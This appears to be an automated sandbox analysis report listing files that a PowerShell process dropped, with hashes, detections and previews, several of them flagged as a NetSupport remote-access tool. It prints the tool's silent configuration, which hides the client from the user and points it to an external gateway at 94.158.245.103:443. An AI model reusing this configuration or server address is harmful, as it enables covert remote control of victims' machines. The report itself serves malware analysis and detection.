                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):396664
                                                                            Entropy (8bit):6.80911343409989
                                                                            Encrypted:false
                                                                            SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\beta.identity_helper.exe.manifest

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1447
                                                                            Entropy (8bit):5.302827444337103
                                                                            Encrypted:false
                                                                            SSDEEP:24:2dt4uiNK+bIgMy5PYMPgiE/M7cJ3Zb2WF+HZ6iYzDfDJ6:cSVK+bIgMyRYSzIlz+HZ6XDfDJ6
                                                                            MD5:FFCF52AB3F76D8FB8E0C0ECA5F858F01
                                                                            SHA1:5EC475C9A55DA6684372373D6DFC5D13B3DE48CF
                                                                            SHA-256:8B6F3769FC0367421E2748C9775BBF16645B502621A8AEEF4974C58BFA067864
                                                                            SHA-512:0E64B1E26130E5A854BB3E321D529957CEE47BEC99D4A0E3A80FCF268661FD5F9DC96E2386FE3EE29654524D03CA900CC7A7CD2499742EB01711AA66DC2A03CB
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>.. <s

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):103824
                                                                            Entropy (8bit):6.674952714045651
                                                                            Encrypted:false
                                                                            SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                            MD5:C4F1B50E3111D29774F7525039FF7086
                                                                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.ini

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):671
                                                                            Entropy (8bit):5.4560190834919675
                                                                            Encrypted:false
                                                                            SSDEEP:12:dxS2hz7YU+Sj8qGShR8kkivlnxOZ7+DP981E7GXXfDWQCYnmSuObANTEa:dI2hzEPI8qNR8pivlnxOoG1fXXfD/DbK
                                                                            MD5:C94845BB509056E66EE5767759C9E5BD
                                                                            SHA1:C1B6E003CF0AB1F236375FAEBE8707D519FD8A3D
                                                                            SHA-256:B2CAADB660455F1AAF3737B93879E35D05602BE1FDF2531602FD61E006E8C80A
                                                                            SHA-512:6C3750804763221BC72031C051EB9AE67874FFAE7795F96435EF577FF3F7E84F5A42C9715EBBDE53B1BD9E9AD5B7E59A691AB36DF2267A5A5FC2C84F032D1E86
                                                                            Malicious:false
                                                                            Preview:0x451906b9....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=0..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=94.158.245.103:443..gskmode=0..GSK=EK:I?GBHEM:H?LDK9M>DCAGB..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\initial_preferences

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):613362
                                                                            Entropy (8bit):6.022362807465715
                                                                            Encrypted:false
                                                                            SSDEEP:12288:MyLOECzdyqLHl8ODcwPawFSoucO5JYhuFMZUpSFW7v1nq2w9b6qW3:kEqNLOODyoNNsqUpSFW7v4j9b6qW3
                                                                            MD5:D34FA84A88438C889B21D1AFA1D7348E
                                                                            SHA1:37905A3931BF2FAA104047408BAA3790AD4A5070
                                                                            SHA-256:98F0F679B47D1151C18064A44A8E097C338EBF1679A23EACC20740EC19852740
                                                                            SHA-512:F7B0CF48C4720F44EA2906CD3101A6C35CF690897ADD6CA66859EAC66B7129CA8805A85309E7747CC83ABB847C17424800D66AC2D4E55A44116F401998F2AC1D
                                                                            Malicious:false
                                                                            Preview:.{"variations_compressed_seed":"H4sIAAAAAAAA\/+y9a5wc11UvOtU9M7a3JLu1ZctS6zUqS\/JIttrd1Y\/plu2EeWikaWukSffokcShVdW1p7s81VVNVfWMJg9uyAVCLpCQB4FAIIRXwiGJHQ6Pe4DLKzrAvQdyD4RLbjgcAhyegRwSOIdzknNuuL\/au6q6dr1bcmzLnuSDPF1r\/ffea639XnstMNNcnu++dmt5YSm\/vLC0tSzlNy8tzN5YXlgfXFpY3lpemN0821nqzM4++eRDKxerF7YGcvc1zyw9CZ9jwIOzSz2+gxqIF5G2jESJX5H5LaRVmfpZcOKyjlohBC3d4AUZtQr5fEYU9ocC1QsAzquKoamym2VM2A\/DWBr74a6ZSi6fK1bztVyhUMiOz8zkTk2lp8fhs54qX5FEpF4aGP2BEVxlF0FklV10SavsYmnsgzuHVa5wrhp\/gQEPzF5ZVAeKyBuSqszzfWOgoStclamfArvOKmYB4gV+oLS7GVF4MIS6\/jg4vKhqbSReUlqBFJkx4cFsCPMT4IjFvLYWzs0GczdOwF3Vai6fKxW5Uq5QqmR31Armn6VSKZefGptiplJT6WnmOgP\/JKKxx8HdC5KOW2u2E7702nkEjleruVNZqrVlqoG\/mQInZwWZN1AT8Vq7u6KpG5KItKu81hv0G+ibBkg39FlF1FRJrDL1ArjLMqXM\/n1\/8t9\/lxEOwmw4wFsZpr4D3LWA1viBbGQ4k9+ykMz+fZ\/H\/CCG\/yx4aCjAUMrMmHAwG4FUXwTHXKKMxGEjcBp74ESBK+ZOmWKcHu\/e\/KNfeG7yOgM\/nUiQC0hfN9S+V5B\/epuC\/LM7UZAH3IIcm2amU9Pp6Xscgf5GChyPF+jSpaZXmH9+m8L8T3eiMCmrnHCE+H0p8MAK30FLypo6K6gDY7Ur6U3JQFWmvugbrLks2N3sqptNvteXkSlRpBhwYo2X

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\install\ctlrvers.dat

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8
                                                                            Entropy (8bit):2.25
                                                                            Encrypted:false
                                                                            SSDEEP:3:SVyn:Ssn
                                                                            MD5:17412178172B24C5E570F6F13C42F4C0
                                                                            SHA1:F0AAC01BDD57F034D9CDA7DBEC9DD97C0DCB81EB
                                                                            SHA-256:2F2BB8B0A74E9049F4EE9DD039D81BC853FA8DB3F311A799032F002B9CC1DE41
                                                                            SHA-512:3B9808F22E3455505DA42B26D3C0C0D56CBAC41FD0D2076C3363273D9E77064047D8FC7B969612A5F5C78E0588F510DDD5B2173BE224B1B5EEDC5E51E9E5A92E
                                                                            Malicious:false
                                                                            Preview:1.0.1244

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\install\en-US.pak

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):366601
                                                                            Entropy (8bit):5.662364865781263
                                                                            Encrypted:false
                                                                            SSDEEP:6144:vxWr2xoTIpupSwg1QMMXntfaY46yX1/PrMN8xKHfHqzHs:8r2WTqUl5MOnqavqY
                                                                            MD5:1761DC1760C752B6A16BF6F8797B207B
                                                                            SHA1:AE0C16AF795ADA3047F086DC841F66FF561FF139
                                                                            SHA-256:8C437A858E53894C6072D521459662FECEB3B1E416F62F3F4961D1F6C62B4C9D
                                                                            SHA-512:EBCE0FE7F70E4F8698B3A758C58309F461A25DDFFA413B8440EDFE593F70EE4D26046E3FE36EB1F01A4C0FA042270EAB29D2D717B0A02F1994870E1D9F4BBE09
                                                                            Malicious:false
                                                                            Preview:......... ..e.$...f.*...g.9...h.O...i.]...j.u...k.....l.....m.....n.....o.H...p.m...q.....r.....s.....t.....u.....v.....w.....x.....y.....z.....{.....|.(...}.,...~.;.....F.....N.....S.....`.....f.....n...........................................................................................................(.....0.....4.....;.....@.....V.....W.....^.....a.....d.....i.....o.....z.....~.................................................................%.....5.....>.....I.....U.....`.....{.................................................................%.....4.....N.....[.....h.....k...........................................................5.....i.....w.............................................................................,.....3.....<.....F.....O.....W.....f.....k.....w...............................................A.....M.....z.........".....#.....$.....%.....&.0...'.7...(.O...).g...+.v.../.....1.....2.....3.....4.....5.....6.....7.....8.....:.....<.!...=.H.....N...................

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\install\fr.pak

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):474195
                                                                            Entropy (8bit):5.557096749384389
                                                                            Encrypted:false
                                                                            SSDEEP:12288:EpFCZh0dne0ymuV8iObj/9XY441LSPwOi6PtQE0sIkcOBZfb9NVmEV//QpSY:EPC/9VVLcd/Qj
                                                                            MD5:DDFCAC89248FDC7C51C1A932B6AC1C37
                                                                            SHA1:B16577290A95346B74C84D95F3B3763219BE999C
                                                                            SHA-256:9FCB23EDFB0C68015EB5DC54B2FA48E2E5C3410FACD56547A33B6888EC71E079
                                                                            SHA-512:84E812C5E0FD0F61EC370D3751ED5F0059E62566E8BE125D705B37DCDB5A04B82399D531C261278D4E9292923EDBCE67B49CFCEB57263B83292C695F745732ED
                                                                            Malicious:false
                                                                            Preview:........&!..e.>...f.D...g.U...h.j...i.x...j.....k.....l.....m.....n.>...o.....p.....q.@...r.V...s.|...t.....u.....v.....w.....x.....y.....z.....{.....|.....}.....~.+.....6.....>.....C.....P.....V.....^.....o.....x.....................................................................................................&.....1.....7.....>.....D.....d.....e.....l.....o.....r.....y.................................................................:.....J.....o.........................................5.....P.....{.........................................&.....2.....H.....X.....k...........................................................X.....s.............................$.....<.....Q.....e.....w...........................................................0.....=.....A.....I.....T.....f.....k.....v...................................$.....F...........................".(...#.R...$.....%.....&.....'.....(.....).....*.&...+.0.../.I...1.[...2.b...3.u...4.....6.....7.....8.....:.....;.....<.....=.5.....=.

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\install\initial_preferences

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):613362
                                                                            Entropy (8bit):6.022362807465715
                                                                            Encrypted:false
                                                                            SSDEEP:12288:MyLOECzdyqLHl8ODcwPawFSoucO5JYhuFMZUpSFW7v1nq2w9b6qW3:kEqNLOODyoNNsqUpSFW7v4j9b6qW3
                                                                            MD5:D34FA84A88438C889B21D1AFA1D7348E
                                                                            SHA1:37905A3931BF2FAA104047408BAA3790AD4A5070
                                                                            SHA-256:98F0F679B47D1151C18064A44A8E097C338EBF1679A23EACC20740EC19852740
                                                                            SHA-512:F7B0CF48C4720F44EA2906CD3101A6C35CF690897ADD6CA66859EAC66B7129CA8805A85309E7747CC83ABB847C17424800D66AC2D4E55A44116F401998F2AC1D
                                                                            Malicious:false
                                                                            Preview:.{"variations_compressed_seed":"H4sIAAAAAAAA\/+y9a5wc11UvOtU9M7a3JLu1ZctS6zUqS\/JIttrd1Y\/plu2EeWikaWukSffokcShVdW1p7s81VVNVfWMJg9uyAVCLpCQB4FAIIRXwiGJHQ6Pe4DLKzrAvQdyD4RLbjgcAhyegRwSOIdzknNuuL\/au6q6dr1bcmzLnuSDPF1r\/ffea639XnstMNNcnu++dmt5YSm\/vLC0tSzlNy8tzN5YXlgfXFpY3lpemN0821nqzM4++eRDKxerF7YGcvc1zyw9CZ9jwIOzSz2+gxqIF5G2jESJX5H5LaRVmfpZcOKyjlohBC3d4AUZtQr5fEYU9ocC1QsAzquKoamym2VM2A\/DWBr74a6ZSi6fK1bztVyhUMiOz8zkTk2lp8fhs54qX5FEpF4aGP2BEVxlF0FklV10SavsYmnsgzuHVa5wrhp\/gQEPzF5ZVAeKyBuSqszzfWOgoStclamfArvOKmYB4gV+oLS7GVF4MIS6\/jg4vKhqbSReUlqBFJkx4cFsCPMT4IjFvLYWzs0GczdOwF3Vai6fKxW5Uq5QqmR31Armn6VSKZefGptiplJT6WnmOgP\/JKKxx8HdC5KOW2u2E7702nkEjleruVNZqrVlqoG\/mQInZwWZN1AT8Vq7u6KpG5KItKu81hv0G+ibBkg39FlF1FRJrDL1ArjLMqXM\/n1\/8t9\/lxEOwmw4wFsZpr4D3LWA1viBbGQ4k9+ykMz+fZ\/H\/CCG\/yx4aCjAUMrMmHAwG4FUXwTHXKKMxGEjcBp74ESBK+ZOmWKcHu\/e\/KNfeG7yOgM\/nUiQC0hfN9S+V5B\/epuC\/LM7UZAH3IIcm2amU9Pp6Xscgf5GChyPF+jSpaZXmH9+m8L8T3eiMCmrnHCE+H0p8MAK30FLypo6K6gDY7Ur6U3JQFWmvugbrLks2N3sqptNvteXkSlRpBhwYo2X

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\install\manifest.json

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):4.67078204534958
                                                                            Encrypted:false
                                                                            SSDEEP:3:mifFuY9HnQA5JVPqS18iMDXAh/OR6TAulLvPxAUNV/RWFVXAkEpMgMYv:v5975JVSS18iMkh26Vlp//gQNMC
                                                                            MD5:CBA80EE11DE525535BF2068AC23107B0
                                                                            SHA1:479C817E5B4AE2E49E1E950359F072DD8A8D227F
                                                                            SHA-256:333654272A482DC66A15D07C778CDFED72E74F6FA50342F00995E26F5DC7678F
                                                                            SHA-512:5ACDFD8874E3506C65446F5B5022879B74D5FAA4D05AF36C9835A35E542BAB21D81AF0F334403F9F3597B12C20C52E2DE9377ED7B22466DEA3D7ECE47810D5F8
                                                                            Malicious:false
                                                                            Preview:{. "name": "MEI Preload", . "icons": {}, . "version": "1.0.7.1652906823", . "manifest_version": 2, . "description": "Contains preloaded data for Media Engagement".}.

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\install\uz.pak

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):428738
                                                                            Entropy (8bit):5.633613175057363
                                                                            Encrypted:false
                                                                            SSDEEP:6144:PO9/3sERZht7a5XBZLE2mV9RfPLyJDPrwnCWacgjjW5cRE0O2fGOGwNws/08gh8h:FER8XzwPgnma9
                                                                            MD5:0E95005552BA506314B1591376EB9D75
                                                                            SHA1:58B3C2EC36D3738AB8E10105C12BE1784C627F31
                                                                            SHA-256:72CB1CBC47EC3D560E02A19B4A9DF7FF6C4E232CA98286158E78CFF346A4CD46
                                                                            SHA-512:88FDDFD0E22C4A21A36C97E27758149691D7E61F8C44CF69AAF3C9CE977CB29FA0949A76BF343A36D352B48BDCBD66C8AD6CEB6FAB7C247A73BDAA4116A314B7
                                                                            Malicious:false
                                                                            Preview:......... y.e.v...f.|...g.....h.....i.....j.....k.....l.*...m.8...n.Z...o.....p.....q.b...r.w...s.....t.....u.....v.....w.....x.....y.....z.....{."...|.....}.2...~.A.....L.....T.....Y.....f.....l.....t.....................................................................................................$.....A.....G.....M.....T.....Z.....r.....s.....z.....}.................................................................*.....1.....N.....b.....y.....................................................6.....M.....q...............................................'.....=.....\.....c.....s.....x.........................................=.....m.....................................................-.....K.....Q.....g.....o...................................................................................).....5.....I....._.......................(.....b.........".....#.....$.....%.....&.9...'.@...(.Y...).m...+.~.../.....1.....2.....3.....4.....5.....6.....7.....:.+...;.Q...<.V...=.z.................0.

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\install\zh-CN.pak

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):361713
                                                                            Entropy (8bit):6.790395434377143
                                                                            Encrypted:false
                                                                            SSDEEP:6144:nBWo6FHO66dFrmKSvqRSRbq9SgvFzJlkVDE:nBWoo563rnyrgtzJlku
                                                                            MD5:B854863EDFE51CED85381590992C1DEA
                                                                            SHA1:5202285EAC135C1D444459E0969D1481833EEA8E
                                                                            SHA-256:41DA1543A2E58B1932EF7E525A93BB3336CBE6CB6AB0648A604D0E59589931EF
                                                                            SHA-512:3C3D1887D99063BA2938D844C2A5FB2F9FDB2FB043347BFC5DD2A0907CD2F1FCF8F25D6B36728D4531E68171055DFD58D82FED636BBE72F46E7076748AC0D6B8
                                                                            Malicious:false
                                                                            Preview:......... ..e.<...f.B...g.V...h.i...i.w...j.....k.....l.....m.....n.....o.x...p.....q.....r.....s.....t.....u.....v.....w.#...x.5...y.I...z.d...{.i...|.t...}.x...~.......................................................................................................1.....8.....@.....H.....J.....M.....V.....h.....q.....w.....}.........................................................................................%.....2.....D.....S.....Y.....n.....}.............................................................................+.....@.....L.....X.....y.................................................................%.....@.....R.....h...........................................................".....2.....>.....J.....Y....._.....k.....y.............................................................................?.....V......................."...".....#.^...$.....%.....&.....'.....(.....).....*.....+...../.....1."...2.(...3.:...4.F...5.^...6.g...7.s...8.....:.....;.....<.....=.............".

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\install_state.json

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1794
                                                                            Entropy (8bit):3.5509498109363986
                                                                            Encrypted:false
                                                                            SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                            MD5:3F78A0569C858AD26452633157103095
                                                                            SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                            SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                            SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                            Malicious:false
                                                                            Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dll

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):773968
                                                                            Entropy (8bit):6.901559811406837
                                                                            Encrypted:false
                                                                            SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                            MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                            SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                            SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                            SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\nskbfltr.inf

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Windows setup INFormation
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):4.93007757242403
                                                                            Encrypted:false
                                                                            SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                            MD5:26E28C01461F7E65C402BDF09923D435
                                                                            SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                            SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                            SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                            Malicious:false
                                                                            Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\nsm_vpro.ini

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):46
                                                                            Entropy (8bit):4.532048032699691
                                                                            Encrypted:false
                                                                            SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                            MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                            SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                            SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                            SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                            Malicious:false
                                                                            Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):33144
                                                                            Entropy (8bit):6.7376663312239256
                                                                            Encrypted:false
                                                                            SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                            MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                            SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                            SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                            SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exe

                                                                            Download File
